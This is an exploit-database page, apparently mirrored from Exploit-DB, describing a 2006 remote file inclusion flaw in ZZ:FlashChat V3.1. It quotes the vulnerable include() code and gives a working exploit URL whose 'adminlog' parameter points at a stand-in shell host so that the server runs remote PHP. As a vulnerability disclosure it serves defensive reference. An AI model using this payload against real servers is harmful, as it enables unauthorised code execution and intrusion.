header-logo
Suggest Exploit
vendor:
ZZ:FlashChat
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: ZZ:FlashChat
Affected Version From: V3.1
Affected Version To: V3.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit

A vulnerability exists in ZZ:FlashChat V3.1, due to the improper validation of user-supplied input in the 'adminlog' parameter of the 'chat/inc/func.add_data.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'adminlog' parameter.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                  
#                                                                            
#Venedor site : http://download.zehnet.de             
#                                                                             
#Version : V3.1                                                  
#                                                               
#
#================================================================================================
#
#Bug in : chat/inc/func.add_data.php
#
#Vlu Code :
#--------------------------------
#
#  if($cfg['autolink']==1){	
#		include($adminlog.'./inc/func.autolink.php'); 
#  }
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/chat/inc/func.add_data.php?cfg[autolink]=1&adminlog=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
==================================================================================================

# milw0rm.com [2006-08-19]